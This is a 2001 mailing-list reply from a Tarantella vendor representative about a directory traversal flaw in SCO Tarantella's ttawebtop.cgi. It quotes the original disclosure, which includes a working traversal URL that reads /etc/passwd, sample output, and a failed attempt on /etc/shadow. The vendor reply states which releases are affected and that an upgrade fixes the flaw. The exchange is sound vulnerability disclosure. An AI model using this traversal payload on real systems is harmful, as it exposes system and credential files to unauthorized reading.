Re: SCO Tarantella Remote file read via ttawebtop.cgi

[Mike McEwen <mikemc () tarantella com>]

On Monday June 18, KF wrote:
> SCO has been notified of this issue. 
>
>
> -------- Original Message --------
> Subject: SCO Tarantella Remote file read via ttawebtop.cgi
> Date: Mon, 18 Jun 2001 13:06:41 -0400
> From: KF <dotslash () snosoft com>
> To: recon () snosoft com
>
>
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
>
> root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
> daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
> lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
> halt:x:7:0:halt:/sbin:/sbin/
> ...
>
>
> No perms to shadow... 
>
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow
>
>  
> File missing
>
> The following file could not be found:
>
>                                               
> /tarantella/../../../../../../../../../../../../../../../etc/shadow
>
>  Please give this information to a Tarantella Administrator.
>
> -KF


This problem was introduced in release 3.01 and was caught during a security 
audit and was fixed for our last release (Tarantella 3.10).

It is a problem for releases 3.00 and 3.01 only.

To fix this problem upgrade to 3.10.

Thank you for reporting this problem.

 - Mike McEwen